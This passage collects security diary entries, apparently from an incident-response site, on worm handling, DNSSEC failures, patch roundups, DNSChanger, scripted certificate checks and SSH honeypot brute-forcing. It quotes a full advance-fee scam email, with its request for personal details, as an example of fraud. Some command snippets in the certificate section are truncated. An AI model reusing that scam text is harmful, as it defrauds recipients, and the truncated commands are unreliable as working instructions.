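    return recursion_desired, ".".join(labels)
```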

Thanks

Mark


A worm has my network, what now?

You may have seen the reports that the New Zealand Ambulance service had to revert to manual processing of calls after a worm affected a number of their systems (http://computerworld.co.nz/news.nsf/news/mystery-virus-disrupts-st-johns-ambulance-service). This got me thinking about what needs to happen to deal with this kind of situation, but first let's set the scene.

Most organisations will have the basic security controls in place: policies, firewalls, antivirus on the desktop and maybe on the servers, scanning software on email and web traffic, possibly even USB control. So how did the worm get in in the first place? This is purely speculation, based on past experiences, and in no way relates to the NZ ambulance case; we are talking hypothetically here. So what could possibly have happened?

There are a few attack vectors I can think of and no doubt you can add to this.

- Option 1: A laptop has been off the corporate network for a while and has not been kept up to date with patches and AV. It is infected when connected to the internet at an insecure location. When it is brought back into the corporate environment (e.g. plugged into the network or connected via VPN), the malware does a little jump for joy and starts spreading.

- Option 2: User browses a web page and is the victim of a drive by. The malware is downloaded and starts spreading.

- Option 3: An email is opened and malware is downloaded and executed.

Any of the three options above is possible in most environments. AV products, whilst good, are far from infallible, and it is easy enough to create malicious payloads that sail past most antivirus products. Once the malware is in, it can do its thing and start attacking the rest of the infrastructure.

So if prevention is difficult, you may have to face the reality that what happened to NZ Ambulance can happen to you. If you can't prevent, you must detect. How can you identify the fact that you have an issue? Worst case scenario, a third party tells you. At the Storm Centre we often contact ISPs, corporations and, yes, sometimes government agencies to give them some bad news; usually they are a tad surprised. It is much better to find these things yourself. It makes explanations to CEOs that much more comfortable.

What should you be looking for? You may look at firewall logs to see what traffic from inside the network is bouncing off the firewall. Examine proxy logs to look for connections to interesting locations (insert your favourite countries here). Look for multiple connections from multiple devices in your network to a few target locations. Examine server and AD logs to find login attempts. You may receive complaints that things are slow, so monitor help desk calls. Systems that stop working may be a clue as well. If you can spend an hour, 30 minutes, or even less looking at your logs on a daily basis, you will be in a better position to identify weirdness. Once it is detected, you can react.
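The "many internal devices talking to a few destinations" pattern is easy to compute once you have (internal source, destination) pairs from proxy or firewall logs. The Python sketch below counts distinct internal sources per destination. The threshold of 5 is an arbitrary placeholder. Popular legitimate destinations (update servers, search engines) will top the list, so compare the output against a baseline or allow-list.

```python
from collections import defaultdict


def fan_in(records, min_sources=5):
    """records: iterable of (internal_src, destination) pairs.

    Return (destination, distinct_source_count) for destinations contacted by at
    least `min_sources` distinct internal hosts, busiest first.
    """
    sources = defaultdict(set)
    for src, dst in records:
        sources[dst].add(src)
    hits = [(dst, len(srcs)) for dst, srcs in sources.items() if len(srcs) >= min_sources]
    return sorted(hits, key=lambda item: (-item[1], item[0]))
```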

You've found the worm, now what? Turning the device off will contain it, but that is unlikely to make management happy, especially if you start switching off critical servers. So you may need to do something else. Workstations may be a bit easier to contain: you could move them to a sandbox or walled-garden environment. Placed on this contained VLAN, they can do less damage to the rest of the organisation. Ideally this is an automated process, but in a pinch someone with quick fingers could achieve it as well. If you see its traffic leaving your environment, you might need to change firewall or IDS/IPS rules.

For eradication, realistically the only safe option is to rebuild: re-image and redeploy the system from known good media. You could attempt a removal process documented by an AV vendor or another organisation, but remember that the AV didn't pick it up in the first place. Since the state of the machine is unknown, you are really better off rebuilding, sorry.

Putting all the above in the context of the incident handling process

Preparation

In addition to the policies and base security controls mentioned above, you may want to consider the following:

- No local admin privileges

- Segmentation in the network

- IDS/IPS

- Log Monitoring and analysis (ACLs, or internal firewalls)

- Private VLANS

- Darknet

Identification

- Look for unusual network activity

- Examine log files

- Become familiar with your environment

Containment

- Move the device to a sandbox VLAN

- Switch it off

- Implement firewall rules, ACLs or other configuration changes to reduce its ability to do damage.

Eradication

- Unfortunately rebuild is the safest option.

- Some vendors may have a removal process

- Identify how they got in and develop strategies to plug the hole

Recovery

- Put systems back in a controlled fashion.

- Monitor activities, watch for their return

Lessons Learned

- Learn the lessons :-)

- Fix the issues identified

- Implement the controls that allow you to ideally prevent, but at least detect it next time.

The above is by no means complete, so if you have anything to add, feel free to add a comment or let us know via the contact form.

Mark H - Shearwater


GET BACK TO ME ASAP

A bit of a twist on the Nigerian 419 scam: the scammer claims to represent the UN and various governments trying to return scammed money to the victims. It is making the rounds in various forms. I've said it before and I'll say it again: if it seems too good to be true, it is. Money sent to fraudsters in foreign countries is lost, gone forever. One version looks like this:

FROM: PAUL OWENS & Co. Solicitors.

Dear Beneficiary,

We are London based solicitors working as representative solicitors to the United Nations, delegated to Nigeria for the investigation and payment of allscam victims and all unreleased payments. In the course of a recently concluded 2010 investigations and subsequent arrests of suspected fraudsters in African region, in collaboration with the present governments of Nigeria, Ghana, Cote D'Ivoire, Burkina Faso and South Africa, the UN security operatives have so far arrested and prosecuted over 300 government and banking officials and arrest is still going on.

So far, the UN security operative has also recovered about $5.1 Billion from both cash in accounts and properties and assets confiscated. It is from the address books of the arrested officials that your email address was recovered.

Right now, the United Nations (UN) and their Africa Union (AU) counterpart is paying a $3,000,000.00 compensation to those whose emails addresses and other personal data are recovered and also paying full contract or inheritance and wining amounts to those with provable information qualifying them as genuine contractors and beneficiaries of funds in the affected countries.

Which Category do you fall? Have you lost money to scam? or are you still in communication with anyone? Are you a legitimate contractor and fund beneficiary in any of the affected countries? Please respond to this e-mail for your compensation payment to be released to you.

Please, indicate clearly as you get back to me for proper guidelines and details on how to receive this compensation OR your full payment. After search through the internets and various confessions from this impostors, we found these details about you and we would want you to reconfirm I would want you to reconfirm and get back to me and I will give you directives on how you are to get your funds. Your Funds has been approved by the UN, Federal Government of Nigeria and the Federal Ministry of Finance so you are covered.

All I do need from you to reconfirm your informations properly

(1)Your Name In Full :....................

(2)Your Delivery Address:.............

(3)Your Occupation:.......................

(4)Your Contact Telephone Number:.......

(5) Age:..................

(6) Sex:..................

--------------------------------------------------------------

So, what do you think? Legit or scam? I am leaning towards scam. There is still the odd typo and awkward grammar. Oh, and the Gmail address for the solicitors is a bit of a giveaway. Last but not least, the phone number also belongs to "INTERNATIONAL MONETARY FUND (IMF, HEAD OFFICE NO: 23 ADEBOYE ST,APAPA LAGOS. TELEPHONE : +234-8024892004". Thanks to CJ for sending this one in. Comments?

Cheers,

Adrien de Beaupré

intru-shun.ca

Teaching SANS Sec560 in Toronto #sanstoronto, 21-26 Nov 2011

sans.org/toronto-2011-cs-2


www.disa.mil down?

The web server behind disa.mil appears to be down. The name currently resolves to 156.112.108.76, but the server is answering requests with TCP resets (RST). Thanks to Paul for noticing and writing in!
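A host that actively resets connections looks different, from the client side, from one that silently drops them behind a firewall. As a rough sketch, assuming Python 3 and a plain TCP connect probe (the function name `probe` is ours, not from any tool), you can tell the two cases apart like this. It only checks the handshake; a server that accepts the connection and resets it later would instead surface as `ConnectionResetError` when you read from the socket.

```python
import socket

def probe(host: str, port: int, timeout: float = 3.0) -> str:
    """Classify a TCP port as 'open', 'reset' or 'timeout' via a connect attempt."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        # Typically the remote side answered our SYN with a RST.
        return "reset"
    except socket.timeout:
        # No answer at all: often a firewall silently dropping the packets.
        return "timeout"

if __name__ == "__main__":
    print(probe("127.0.0.1", 9))  # usually 'reset' unless something listens on port 9
```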

Cheers,

Adrien de Beaupré

intru-shun.ca

Teaching SANS Sec560 in Toronto #sanstoronto, 21-26 Nov 2011

sans.org/toronto-2011-cs-2


Apple update summary

Those folks over at Apple Inc have been churning out the patches recently, so to keep them all together, here is a little summary:

Apple ID: APPLE-SA-2011-11-14-1 iTunes 10.5.1

Impact: A man-in-the-middle attacker may offer software that appears to originate from Apple

CVE: CVE-2008-3434

Apple ID: APPLE-SA-2011-11-10-2 Time Capsule and AirPort Base Station (802.11n) Firmware 7.6

Impact: An attacker in a privileged network position may be able to cause arbitrary command execution via malicious DHCP responses

CVE: CVE-2011-0997

Apple ID: APPLE-SA-2011-11-10-1 iOS 5.0.1 Software Update

Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information

CVE: CVE-2011-3246

Impact: Viewing a document containing a maliciously crafted font may lead to arbitrary code execution

CVE: CVE-2011-3439

Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information

CVE: None provided

Impact: An application may execute unsigned code

CVE: CVE-2011-3442

Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information

CVE: CVE-2011-3441

Impact: A person with physical access to a locked iPad 2 may be able to access some of the user's data

CVE: CVE-2011-3440

None of these appears to address the sandbox vulnerability announced by Core Security (CVE-2011-1516) referenced here.

Also note Swa's earlier diary on recent updates to the Java distribution.

Steve

ISC Handler


Details About the fbi.gov DNSSEC Configuration Issue.

We got a number of comments regarding the fbi.gov DNSSEC issue, which I think warrant explaining DNSSEC in a bit more detail.

First of all: the fbi.gov domain is fine. The issue does not appear to be attack-related and is a very common configuration problem with DNSSEC (yes... our dshield.org domain had similar issues in the past, which is why I am somewhat familiar with how this can happen).

First a very brief DNSSEC primer:

DNSSEC means that for each DNS record, your zone will include a signature. The signature is generated using a "zone signing key". Like any good signature, the signature has a limited lifetime. Commonly, the lifetime is in the range of a couple of weeks.

As a result, the signatures need to be re-created before their lifetime expires. In the case of fbi.gov:

$ dig A www.fbi.gov +dnssec +short @156.154.105.27

www.fbi.gov.c.footprint.net.

CNAME 7 3 300 20111110173726 20110812173726 58969 fbi.gov.

The signature was created Aug. 12 2011 and expired on Nov. 10 2011 at 17:37:26 UTC (in the output, the expiration timestamp comes before the inception timestamp).
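The two long numbers in the RRSIG data are the signature expiration and inception times, written as YYYYMMDDHHmmSS in UTC (RFC 4034; the RFC also permits a plain seconds-since-epoch form, which this sketch does not handle). A minimal Python sketch, assuming you paste in the RRSIG fields as dig printed them above (the helper names are hypothetical), that checks whether a signature is valid at a given moment:

```python
from datetime import datetime, timezone

def parse_rrsig_time(value: str) -> datetime:
    # YYYYMMDDHHmmSS, always interpreted as UTC.
    return datetime.strptime(value, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)

def rrsig_window(rdata: str):
    """Return (inception, expiration) from RRSIG rdata as printed by dig."""
    fields = rdata.split()
    # Field order: type covered, algorithm, labels, original TTL,
    #              expiration, inception, key tag, signer name, signature.
    return parse_rrsig_time(fields[5]), parse_rrsig_time(fields[4])

def rrsig_valid_at(rdata: str, when: datetime) -> bool:
    inception, expiration = rrsig_window(rdata)
    return inception <= when <= expiration

sig = "CNAME 7 3 300 20111110173726 20110812173726 58969 fbi.gov."
inception, expiration = rrsig_window(sig)
print(inception.isoformat(), expiration.isoformat())
# 2011-08-12T17:37:26+00:00 2011-11-10T17:37:26+00:00
print(rrsig_valid_at(sig, datetime(2011, 11, 11, tzinfo=timezone.utc)))  # False
```

Running a check like this from cron against your own zone, and alerting when the expiration is only a few days away, is one way to catch a missed re-signing before validating resolvers do.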

Other DNS servers resolving the domain do not HAVE to check DNSSEC. If they don't, the domain will continue to resolve just fine. However, if your DNS server happens to validate DNSSEC signatures, validation will fail and, as a result, DNS resolution will fail.

Comcast and OpenDNS, for example, validate DNSSEC, and if you are using either for your DNS resolution, you will no longer be able to reach fbi.gov.

If you are using DNSSEC yourself, or if you are interested in checking whether DNSSEC is configured correctly for another site, I recommend dnsviz.net or Verisign's DNSSEC debugger at http://dnssec-debugger.verisignlabs.com. Both are excellent resources for debugging DNSSEC issues.

DNSSEC isn't exactly a simple configuration change. We have discussed it in past diaries and webcasts. Please make sure you understand its implications before enabling it. I do recommend enabling it, as it provides meaningful protection against DNS spoofing, which is a precursor to various man-in-the-middle attacks. DNSSEC does not encrypt anything; it only authenticates the DNS response. Enabling DNSSEC validation on your resolver, on the other hand, is pretty straightforward and protects users of your resolver from spoofed DNS responses (the path from your resolver to the client may of course still be subject to spoofing, unless the client does its own validation).

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter


What's up with fbi.gov DNS?

We received a report from a reader that fbi.gov is not resolving. Sure enough, when I do an nslookup or dig, I do not receive an answer from the authoritative server.

$ nslookup fbi.gov

Non-authoritative answer:

Name: fbi.gov

Address: 209.251.178.99

Digging a little deeper, it appears it may be a problem with a DNSSEC key. If you follow the DNS server chain, it appears to be OK.

-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Stuff I Learned Scripting - Parsing XML in a One-Liner

This is the second story in this "Stuff I Learned Scripting" series. As I write scripts, I tend to stumble over commands or methods that I didn't know even existed before, and I thought I'd share these with our readers as they come up. Since I'm finding some of these commands for the first time, I invite you to post any more "elegant" or correct methods in our comment form.

If you're like me, you get a generally "good feeling" when you see config files set up as XML; it's an open standard with loads of tools to parse it.

However ... I was recently tasked with parsing variables out of an XML file, using *only* what is available in Windows. This turned out to be trickier than I thought - XML is a tad more complex than your traditional "variable=value" Windows INI file (or registry key, for that matter). This is one of the reasons I've been (subconsciously, I think) avoiding writing automation scripts against XML.

On the face of it, it might look easy - for instance:

<some variable> value </some variable>

is easy to get with the "find" command. But the same construct could just as easily be represented as:

<some variable>

value

</some variable>

which is *not* so easy to pull out using the find command in Windows.
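To illustrate the problem outside of Windows, here is a minimal Python sketch (our own illustration, not a Windows tool) that compares a find-style, line-by-line match against a real XML parser. The element name `somevariable` is hypothetical, since XML element names cannot contain spaces:

```python
import re
import xml.etree.ElementTree as ET

one_line = "<config><somevariable> value </somevariable></config>"
multi_line = "<config>\n<somevariable>\nvalue\n</somevariable>\n</config>"

def line_match(doc: str):
    # Mimics a line-oriented tool such as find: opening tag, value and
    # closing tag must all sit on the same line.
    for line in doc.splitlines():
        m = re.search(r"<somevariable>(.*?)</somevariable>", line)
        if m:
            return m.group(1).strip()
    return None

def xml_match(doc: str):
    # A real parser does not care how the element is laid out.
    text = ET.fromstring(doc).findtext("somevariable")
    return text.strip() if text is not None else None

print(line_match(one_line), line_match(multi_line))  # value None
print(xml_match(one_line), xml_match(multi_line))    # value value
```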

Also, XML is hierarchical, so:

<config>

<var>

value

</var>

</config>

is different altogether from:

<servername>

<var>

value

</var>

</servername>
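The same point in code, as a sketch using Python's standard library. The `<root>` wrapper is our addition, because a well-formed XML document has exactly one top-level element. A search on the tag name alone finds both `var` elements and cannot tell them apart, while a path anchored at the parent picks out exactly one:

```python
import xml.etree.ElementTree as ET

doc = """<root>
  <config><var>config-value</var></config>
  <servername><var>server-value</var></servername>
</root>"""

root = ET.fromstring(doc)

# Searching by tag name alone returns every <var>, wherever it lives.
print([v.text for v in root.iter("var")])  # ['config-value', 'server-value']

# A path relative to the root element selects exactly one of them.
print(root.findtext("config/var"))      # config-value
print(root.findtext("servername/var"))  # server-value
```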

At that point, I took a deep breath and decided it was time to dive into Powershell. Powershell has everything needed to parse and write XML out of the box, and it meets the requirement of actually being on every box (well, every new Windows box anyway). There are tons of sites out there that explain how to do complex XML gymnastics, but in security audits all that is generally needed is a simple read of specific target variables. For instance, if you are auditing a VMware vCenter configuration against the VMware Hardening Guide, you should be looking at variables in the "vpxd.cfg" file, which is formatted in XML. One of the variables you'll want to look at is "enableHttpDatastoreAccess", which, if enabled, allows you to browse your ESX/ESXi datastores with a web browser (with appropriate credentials, of course). The Hardening Guide recommends turning this off in some circumstances (their term is "SSLF" - Specialized Security Limited Functionality), so during an audit this value should at least be noted. In the config file, this value is represented as:

<config>

... other config variables and constructs ...

<enableHttpDatastoreAccess>

value

</enableHttpDatastoreAccess>

</config>

You can do this in 2 lines in powershell (though they may wrap on your display, depending on your screen resolution), with something like:

| Command | What it does |
|---|---|
| [xml]$vpxdvars = Get-Content ./vpxd.cfg | Reads an entire XML-formatted file into the Powershell variable "vpxdvars". |
| write-Host $vpxdvars.config.enableHttpDatastoreAccess | The hierarchical structure of the XML file is navigated by dot-separation. In this example we simply print (using write-Host) the target variable, represented as config.enableHttpDatastoreAccess in the XML file. |

But how do you stuff this into a CMD file in windows? Simple - use the powershell "-Command" option, and string the Powershell commands together with semicolons. The line shown here will run from the command line or (more usefully) from within a CMD File:

powershell -Command "[xml]$vpxd = Get-Content ./vpxd.cfg; write-Host $vpxd.config.enableHttpDatastoreAccess"

And yes, I know, I know, this has probably existed in Linux forever, but in most enterprises Windows scripts tend to be preferred (he said, glancing up hastily for thunderclouds and lightning bolts). Having said that (and survived, so far anyway), I tend to use xpath in Linux if I need something simple in a bash script. It comes as part of the Perl library XML::XPath, which is available as a package on most major distributions. For instance, the query above might be represented as (command output is also shown):

# xpath -e '/config/enableHttpDatastoreAccess' ./vpxd.cfg

Found 1 nodes in ./vpxd.cfg:

-- NODE --

<enableHttpDatastoreAccess>

FALSE

</enableHttpDatastoreAccess>

To get just the value, we'll use the "q" (for quiet) option, which filters out the "Found" and "NODE" lines, leaving only the matching node. Then we'll strip the opening and closing tags by using grep to ignore any line with a ">" in it:

# xpath -q -e '/config/enableHttpDatastoreAccess' ./vpxd.cfg | grep -v '>'

FALSE
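If Python happens to be installed (an assumption: unlike Powershell on a new Windows box, it is not guaranteed to be there), its standard library can run the same query without the grep step, because the parser hands back the element text and only the surrounding whitespace needs stripping. The helper name `read_setting` and the in-memory sample are illustrative:

```python
import io
import xml.etree.ElementTree as ET

def read_setting(source, path: str):
    """Return the stripped text of the first element matching path, or None.

    source may be a filename (e.g. "./vpxd.cfg") or an open file object.
    """
    root = ET.parse(source).getroot()  # for vpxd.cfg this is <config>
    text = root.findtext(path)
    return text.strip() if text is not None else None

# Demo on an in-memory copy of the layout shown above.
sample = io.StringIO(
    "<config>\n<enableHttpDatastoreAccess>\nFALSE\n</enableHttpDatastoreAccess>\n</config>\n"
)
print(read_setting(sample, "enableHttpDatastoreAccess"))  # FALSE
```

Against the real file you would call read_setting("./vpxd.cfg", "enableHttpDatastoreAccess"). ElementTree paths are evaluated relative to the root element (here <config>), which is why the leading /config/ from the xpath query is dropped.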

And yes, you could do this simple example query in SED (though every time I think I have it right, I find a case where it breaks), and GREP and AWK are also tools you can use for XML parsing, with a similar caveat. But xpath commands are much easier and much more "readable" - and readable scripts are REALLY important if you are planning to give them to a client, especially if they're not a SED / AWK / GREP / scripting guru. If you expect someone else to read your script, complex is NOT better. So you'll tend to see understandable, simple scripts in this series.

For more complex XML operations and results, a more complex tool is usually required - if you need true "XML gymnastics", it might be time to write a more complex program in Perl, Powershell or Python (or your favourite language that supports XML, it doesn't necessarily need to start with a "P").

As always, I'm sure that there are true XML and Powershell experts out there (I'm not an expert at either) - if there's a better / simpler way to get this done than the one method I've described, please share on our comment form !!

If this particular example (and the certificate example I used on Monday) are of particular interest to you, they are both from the Security Class SANS SEC579 - Virtualization and Private Cloud Security ( http://www.sans.org/security-training/virtualization-private-cloud-security-1651-mid ), which will be offered first in January. (shameless plug - I'm a co-author for that course)

===============

Rob VandenBrink

Metafore


Operation Ghost Click: FBI bags crime ring responsible for $14 million in losses

Source: http://www.fbi.gov/news/stories/2011/november/malware_110911/malware_110911

The FBI has unsealed a federal indictment that includes details of the two-year FBI investigation called Operation Ghost Click, as announced today in New York.

The article describes the arrest of six Estonian nationals who have been charged with "running a sophisticated Internet fraud ring that infected millions of computers worldwide with a virus and enabled the thieves to manipulate the multi-billion-dollar Internet advertising industry."

The FBI offers details on determining if you've been affected by DNSChanger in this PDF.

This cybercrime ring used "DNSChanger to redirect unsuspecting users to rogue servers controlled by the cyber thieves, allowing them to manipulate users’ web activity."

The DNS Changer Working Group (DCWG), with cooperation from SANS handlers, will be publishing more details soon as they have been closely monitoring this class of malware.

As you may well be aware, several different malware families, including Zlob and others, have modified DNS settings to redirect customer traffic in the past. This particular operation used TDSS and possibly other malware. DNSChanger has been installed in many different ways; it isn't a single piece of malware so much as a class of malware that exhibits certain characteristics.

ISC handlers have published many diaries over the years about various DNSChanger malware including a recent Mac version:

(Minor) evolution in Mac DNS changer malware

DNS changer Trojan for Mac (!) in the wild

ISC Handler Donald Smith, who provided the details for this diary entry, advises that:

"ISPs and corporations that wish to assist their customers can route the rogue space to their resolvers and NAT/PAT from the rogue DNS space to their resolver space, their resolvers will answer the query and the answer gets re-NAT/PAT and the customers get the correct dns response. Add logging and you have a list of infected customers." It is recommended though that you "be extremely careful in what you consider rogue address space and how long you keep things considered as such: that's the tricky part." [Swa Frantzen]

Finally, thanks to a coordinated effort of trusted industry partners, a mitigation plan commenced today to replace rogue DNS servers with clean DNS servers to keep millions online, while providing ISPs the opportunity to coordinate user remediation efforts. Such effort means that those infected with DNSChanger, who otherwise would have had no DNS and basically no Internet ability, still get to use the Intarwebs. :-)
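Donald Smith's NAT-plus-logging approach above ends with a list of customers whose DNS traffic was headed for rogue servers. Building that list boils down to checking each client's resolver address against the rogue address space. A minimal Python sketch: the networks below are RFC 5737 documentation placeholders, NOT the real DNSChanger ranges, which you would take from the FBI material and review carefully before acting on them, and the (client, resolver) log format is hypothetical:

```python
import ipaddress

# PLACEHOLDERS ONLY (RFC 5737 documentation prefixes). Replace with the
# rogue DNS ranges published for DNSChanger before using this.
ROGUE_DNS_NETS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

def is_rogue_resolver(resolver_ip: str) -> bool:
    """True if the resolver address lies inside one of the rogue ranges."""
    addr = ipaddress.ip_address(resolver_ip)
    return any(addr in net for net in ROGUE_DNS_NETS)

def infected_clients(observations):
    """observations: iterable of (client_ip, resolver_ip) pairs, e.g. taken
    from NAT or flow logs. Returns the sorted clients that used rogue DNS."""
    return sorted({client for client, resolver in observations
                   if is_rogue_resolver(resolver)})

log = [("10.0.0.5", "192.0.2.53"), ("10.0.0.6", "10.0.0.1"),
       ("10.0.0.7", "198.51.100.9")]
print(infected_clients(log))  # ['10.0.0.5', '10.0.0.7']
```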

Stay tuned for more, and feel free to share your experiences with DNSChanger via comments.


Apple Black Tuesday

Joel pointed out that Apple had joined the Black Tuesday update frenzy this month with an update for Java:

Snow Leopard gets Java for Mac OS X 10.6 Update 6, while Lion gets Java for Mac OS X 10.7 Update 1. Both essentially update Java SE 6 to 1.6.0_29.

The CVE names that are fixed are:

- CVE-2011-3389

- CVE-2011-3521

- CVE-2011-3544

- CVE-2011-3545

- CVE-2011-3546

- CVE-2011-3547

- CVE-2011-3548

- CVE-2011-3549

- CVE-2011-3551

- CVE-2011-3552

- CVE-2011-3553

- CVE-2011-3554

- CVE-2011-3556

- CVE-2011-3557

- CVE-2011-3558

- CVE-2011-3560

- CVE-2011-3561

More on the Apple security updates: http://support.apple.com/kb/HT1222

--

Swa Frantzen -- Section 66

Adobe November 2011 Black Tuesday Overview

Adobe has released 1 bulletin today.

This updates Adobe products to the following versions:

- Shockwave Player 11.6.3.633

| # | Affected | Known Exploits | Adobe rating |
|---|---|---|---|
| APSB11-27 | Multiple memory corruption vulnerabilities in the Shockwave Player allow random code execution. Shockwave Player: CVE-2011-2446, CVE-2011-2447, CVE-2011-2448, CVE-2011-2449 | TBD | Critical |

--

Swa Frantzen -- Section 66


Firefox 8.0 released

Rene wrote in to point out that Firefox 8.0 is released.

- Release notes are at http://www.mozilla.org/en-US/firefox/8.0/releasenotes/

- Security fixes are documented at http://www.mozilla.org/security/known-vulnerabilities/firefox.html#firefox8

--

Swa Frantzen -- Section 66


Microsoft November 2011 Black Tuesday Overview

Overview of the November 2011 Microsoft patches and their status.

| # | Affected | Contra Indications - KB | Known Exploits | Microsoft rating(**) | ISC rating(*) clients | ISC rating(*) servers |
|---|---|---|---|---|---|---|
| MS11-083 | An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. The attacker gets kernel-level permissions. Replaces MS11-064. Windows TCP/IP: CVE-2011-2013 | KB 2588516 | No publicly known exploits. | Severity:Critical Exploitability:2 | Critical | Critical |
| MS11-084 | An input validation vulnerability in the parsing of TrueType fonts allows a denial of service from users with valid credentials. Replaces MS11-077. Kernel mode drivers: CVE-2011-2004 | KB 2617657 | No publicly known exploits. | Severity:Moderate Exploitability:- | Important | Less Urgent |
| MS11-085 | Inappropriate path restriction allows Windows Mail and Windows Meeting Space to be exploited into executing random code with the rights of the logged-on user. Yet another vulnerability related to SA 2269637. Windows Mail & Windows Meeting Space: CVE-2011-2016 | KB 2620704 | No publicly known exploits. | Severity:Important Exploitability:1 | Critical | Important |
| MS11-086 | If Active Directory is configured to use LDAP over SSL, an attacker holding a revoked certificate that is associated with a valid domain account could get authenticated. Replaces MS10-068. Active Directory: CVE-2011-2014 | KB 2630837 | No publicly known exploits. | Severity:Critical Exploitability:1 | Critical | Critical |

We appreciate updates

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

- We use 4 levels:

- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.

- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.

- Important: Things where more testing and other measures can help.

- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.

- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.

- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for how many affected systems there are. It is for an affected system in a typical worst-case role.

- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.

- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all, because Microsoft assigns too many ratings to some of the patches to list them all.

--

Swa Frantzen -- Section 66


Juniper BGP issues causing localized Internet problems

We're starting to get reports (thanks to both Branson and Darryl) that a Juniper OS bug with BGP, combined with some specific BGP updates today, is resulting in some key Internet routers being DoS'd due to high CPU loads. We'll post more data as it comes in.

===============

Rob VandenBrink

Metafore

Stuff I Learned Scripting - Evaluating a Remote SSL Certificate

I find that the longer I work in this field, the more scripts I write. Solving a problem with a script might take a bit longer the first time, but the next time you see the problem, it takes seconds to resolve (assuming you can find your script again, that is). This is illustrated so well (and so timely) here ==> http://www.xkcd.com/974/

But I'm not here to sell you on scripting, or on any particular scripting language. This story is about neat stuff I've learned while scripting: tidbits I wouldn't have learned otherwise, and that I hope you find useful as well.

Recently I had to assess whether a remote Windows host was using a self-signed certificate, or one issued by a public or a private CA (Certificate Authority). The remote host was a VMware vCenter console, but that's not really material to the script, other than dictating the path.

Easy you say, use a browser! Sure, that's ONE easy way, but what if you've got 10 others to assess, or a hundred? Or more likely, what if this is one check in hundreds in an audit or assessment? It's at that point that the "this needs a script" lightbulb goes off for me.

In this case I "discovered" the Windows command CERTUTIL.EXE. Typing "certutil -?" will get you pages of syntax for the complex things this command can do, but in this case all we want to do is dump the certificate information. Since the server is remote, let's map a drive and query the cert:

>map l: \

>certutil -dump "l:\programdata\vmware\vmware virtualcenter\SSL\rui.crt"

O=VMware Installer

O=VMware, Inc.

>psexec \\%1 -u %2 -p %3 cmd /c certutil -dump "%allusersprofile%\vmware\vmware virtualcenter\ssl\rui.crt" | find "CN="

CN=VMware default certificate

These show that the certificate is the default certificate, installed by the VMware Installer.

depth=0 /O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com

verify error:num=20:unable to get local issuer certificate

verify return:1

depth=0 /O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com

verify error:num=27:certificate not trusted

verify return:1

depth=0 /O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com

verify error:num=21:unable to verify the first certificate

verify return:1

0 s:/O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com i:/O=VMware Installer subject=/O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com issuer=/O=VMware Installer

DONE
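To turn output like the above into a check you can repeat across many hosts, you can compare the subject and issuer lines. A minimal Python sketch, assuming the older slash-separated one-line DN format shown above (newer OpenSSL versions print DNs with commas instead, and values containing "/" would break this naive split) and using this example's VMware default-certificate strings as markers; the function names are ours. Note that subject == issuer is only a heuristic for "self-signed"; proving it requires verifying the signature with the certificate's own key.

```python
def parse_dn(dn: str) -> dict:
    """Parse a one-line DN such as /O=VMware, Inc./CN=host into a dict."""
    parts = {}
    for rdn in dn.strip().strip("/").split("/"):
        key, _, value = rdn.partition("=")
        parts[key] = value  # repeated keys (e.g. several OUs) keep the last one
    return parts

def classify_cert(subject: str, issuer: str) -> str:
    subj, iss = parse_dn(subject), parse_dn(issuer)
    if subj.get("CN") == "VMware default certificate" or iss.get("O") == "VMware Installer":
        return "vmware-default"
    if subj == iss:
        return "self-signed"
    return "ca-issued"  # public or private CA: check the chain to tell which

subject = "/O=VMware, Inc./OU=VMware, Inc./CN=VMware default certificate/emailAddress=support@vmware.com"
issuer = "/O=VMware Installer"
print(classify_cert(subject, issuer))  # vmware-default
```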

Oh - and can you please pass the salt ?

===============

Rob VandenBrink

Metafore

New, odd SSH brute force behavior

Over the past 72 hours, I've noticed a shift in the types of brute force attacks I'm seeing on my SSH honeypot. Generally, SSH attacks consist of hundreds (or thousands) of authentication attempts, each using a different username/password combination. Over the past few days, however, I'm seeing multiple IP addresses attempting to use *one* password against *one* account: root/ihatehackers.

In a sense, a single IP address taking a "one-off" shot at root doesn't really even qualify as "brute-force" and is... well... barely an attack. What I find interesting about this new behavior is the number of different sources I'm seeing for this single, somewhat lame hack.
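If you want to check your own logs for this pattern, the interesting number is how many distinct source addresses try each username/password pair. A minimal Python sketch, assuming your honeypot logs have already been reduced to (source IP, username, password) tuples; the record format and the sample addresses (RFC 5737 documentation ranges) are hypothetical:

```python
from collections import defaultdict

def sources_per_credential(attempts):
    """Map each (username, password) pair to the set of source IPs trying it."""
    seen = defaultdict(set)
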